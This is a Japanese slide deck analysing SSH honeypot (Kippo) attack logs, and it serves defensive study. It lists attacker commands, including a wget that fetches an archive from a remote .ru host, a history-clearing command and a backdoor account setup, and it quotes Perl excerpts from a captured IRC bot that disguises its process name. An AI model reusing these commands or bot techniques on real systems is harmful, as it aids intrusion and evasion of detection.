1. 特に結論はありません

2. Twitter: abend@number3to4
ただのセキュリティエンジニア（Webセキュリティがメインです）

3. 囮として、やってきた攻撃者の動作などを観察するためのもの
あほ面のクマをとらえることができる。

4. Kippoって、pythonで書かれたものでSSHをシミュレートしたハニーポット
で、簡単に言うと
SSHサービスのふりをした別なもの。

5. Kippoはシミュレートできるコマンドは限られており、rootでは稼働
できないようになっている。
閉じられた世界で実行するようになっているので、他への影響が少ない。
問題があってもアクセス
できないので、リスクは
少ないｗ

6. 今日はlogにあった攻撃ログを読み返してみることで、防御に役立てる
ことを目的に、どんな攻撃があったのかを紹介します。
※本当に役立つかは別問題。
Kippoを動かし始めた2014/1/3から現在までのログです。
ログイン可能なユーザはrootで、パスワードは123456（defaultのまま）
本内容は自身の管理外の環境に対して、実施しないでください。

7. 約1か月間で583回（ユニークなIPは253）ログインが成功しているが、
下記2点による影響と思われる。
・rootでのログイン許可
・脆弱なパスワードを設定
116.10.XXX.XXXは、複数日にわたりアクセス（計18回ログインに成功）
しているが、root/adminを試行した後にroot/123456でログインに成功
しており、ログイン後、sftpを起動しようとしてエラーで終了を繰り
返しているため、ツールやbot的なものであると思われる。
認証の失敗回数は、97,980回。最大回数は4,714回で、試行している
クレデンシャルは、辞書登録されているような文字列だった。

8. 多くが中国からでした。

9. ほとんどがrootでのログイン試行だった。
「admin」、「123456」など定番なもの。「!QAZ@WSX」が上位に含まれて
いるが、USキーボードだもんね。
ユーザ名
パスワード

10. Kippoには、攻撃者の動作を記録し、再生できる機能がある。
攻撃者のtypoも見逃すことがない。
app-get install poerl
の後のapp-get install
perlがアツい。

11. 攻撃者はいったいどんなことをしていたのか。
大別すると3つに分類される。
② バックドアを仕込む
・adduser .bash
・各種バックドアの仕込み
① 情報収集
・uname –a
・ifconfig
・cat /proc/cpuinfo
③ 侵入痕跡を残さないようにする
・unset HISTLOG
・バックドアの残骸の削除やフォルダ名の頭に.(ドット)つける

12. ① 100Mのファイルをwgetして、通信速度の計測
攻撃者の中でも、何をしたかったのかよく分からない人たちもいました。

13. ② LinuxサーバでWinSP2のサービスパックをwgetして終わり
何をしたかったのか分からない。
別な何かと戦っている
のかもしれない。

14. ③ 展開してないから
wget htt://xxxx.ru/xxx.tar.gz
cd xxx.tar.gz
cdできないなんて。
なんて、無力な存在なんだ。

15. 攻撃者がバックドアを仕込むために、外部のサイトからwgetした
土産を置いていってくれました。
HackTool.Linux.Sshscan.b
DoS.Perl.BBDoS.c
not-a-virus:NetTool.Unix.Mech.a
HackTool.Linux.Shark.a
Backdoor.Perl.Shellbot.s
HackTool.Linux.WuScan.b
※Kasperskyでの検知名
その中の1つピックアップして紹介します。

16. ゲットしたIRC botをVirusTotalに放り込むと

17. 攻撃者はIRC Serverを介して、被害者の端末を操作できるもので、
ロシアのIRC Serverがセットされていた。
実行プロセス名の偽装
my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"spamd child",
"httpd");
my $xproc = $fakeps[rand scalar @fakeps];
$0="$xproc"."0";
IRCに接続するユーザ名もランダムで選択するようになっていた。

18. Proxyも対応しており、いろいろな環境で動作できるように作られている。
grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(d+))?(/S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path = "/" unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(d+)(/S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
ただし、HTTPSに対応していない。

19. Talkでコマンドを送ると、レスポンスを話してくれる。
ただし、HTTPSに対応していない。

20. 特別なことではありませんが。。。
・rootでのログインは許可しちゃだめ。
・パスワードは安易な文字列にしちゃだめ。
・アカウントの改廃は適宜行おう。
→ root以外にも試行されるかもしれないので。
IRC botだって、使い方間違わなければ、効率化に利用できるはず。
たとえば、 DDoS 何かあるはず、きっと。